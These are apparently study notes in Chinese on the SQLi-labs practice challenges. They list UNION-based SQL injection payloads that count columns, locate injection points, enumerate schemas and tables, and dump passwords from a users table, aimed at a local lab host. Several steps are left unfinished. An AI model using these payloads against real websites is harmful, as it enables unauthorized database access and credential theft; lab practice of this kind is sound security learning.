符号含义:(1)?:作用为注释一个变量
(2)--+:+在这里相当于空格;整个是注释
判断字段数:?id=x'(可变) union select 1,2,3 --+ [1,2,3表示第几个字段]
判断字段数:?id=0' order by x --+ [其中可以先给x从小到大赋值,直到报错,就可知道字段数了]
判断注入点:?id=1 and 1=2
闭合注入点:?id=1 'and 1=2 --+ ?id=1 'and 1=1 --+
查询数据库:?id=0' union select 1,2,database(); --+ [database()意为返回当前数据库名称]
查询表名。group_concat函数用法:?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
访问表里面的数据:?id=0' union select 1,2,group_concat(password) from security.users --+
查询列名?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
一.less-1
1.判断字段数(是3的时候无反应,而4报错,显然字段数是3)
2.查询库名
3.查询表名
5.查询列名:(?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' 或者'emails'或者'uagent'--+)此处省略
6.查询列中数据:
二.less_2
1.判断注入点报错,说明1=2被执行,说明源代码没有闭合。其余步骤与第一题类似
```````
三.less-3
在有注释和没有注释的情况下都报错说明两种情况下1=2都被执行了,说明必然在外面还存在一个闭合符号
没有报错,说明猜想成立。源代码必然是('id')的形式;
2.判断字段数输入很多组数据,知道有三个字段;
3.查询数据库:
4.查询表
5.查询列名
6.查询列中数据
四.less-4
1.判断注入点http://sql-labs:8000/less-4/?id=1%27%20and%201=2--+
http://sql-labs:8000/less-4/?id=1%27%20and%201=2
http://sql-labs:8000/Less-4/?id=0%22%20and%201=2???????????????????????
说明是“闭合
2.判断字段数:
3.查数据库
``````````````````````````````````````````````````````````````````````````````````````(此处省略)
查表中数据 密码
五.less-5
1:判断注入点不报错,说明在‘处有注入点
2.判断字段数:
六.less-6
````````````````````````````````````````````````````````````````我···